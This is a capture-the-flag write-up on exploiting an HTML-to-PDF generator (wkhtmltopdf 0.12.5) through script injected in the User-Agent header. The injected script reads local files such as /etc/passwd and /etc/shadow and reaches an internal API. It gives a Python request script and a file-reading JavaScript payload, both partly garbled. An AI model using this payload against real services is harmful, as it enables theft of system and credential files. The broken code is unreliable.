Tags: expl web 



For this challenge, we get a link to a website. Its only feature is to generate a pdf with custom content.

## Finding and exploiting the vulnerability

I first tried to find out which tool actually generates the pdf files. This was pretty simple to find, as I just had to open the file with e.g. Adobe Acrobat and look at the metadata.
The website seems to be running wkhtmltopdf 0.12.5!

I googled for exploits with this tool and quickly found out, that it has a XSS vulnerability which can be used for LFI (Local File Inclusion) of the backend. To exploit it, I just need to put my script into the User-Agent header. After playing around with it, I also found out that the generator prints out the result of the script, which really helps.

I used this code to quickly generate the pdfs:

import requests
import time

with open("payload.html") as f:
UA = f.read().replace("\n", "")

res = requests.post(
{"pdf_form": time.time()},
headers={"User-Agent": UA},

with open("/tmp/pdf.pdf", "wb") as f:

And this payload to retrieve file contents:

x = new XMLHttpRequest();
x.open('GET', 'file:///etc/passwd', false);

' + x.responseText + '

## Finding something useful

But how should we now find the flag? The usual places like /flag or /root/flag.txt are not available. By chance I found out that we can even read /etc/shadow but nothing unusual inside. I found the kind of web framework running by reading /etc/hostname (flask) and that the pdf is always temporarely saved inside /tmp/.

Then I actually found something interesting. /root/.bash_history contains something...

cat /etc/passwd

But this didn't lead me any further...

After another while of not finding anything, I found out that there is a nodeapi running in another container by reading /etc/hosts!

## The API

Now we just have to find the proper endpoint. The port for the API was 3000 so I was able to call the api with

<iframe src=""></iframe>

After some lucky guessing I also found out where the flag was:


Original writeup (https://github.com/xXLeoXxOne/writeups/blob/main/CyberSecurityRumble%202022/PDFCARNAGE.md).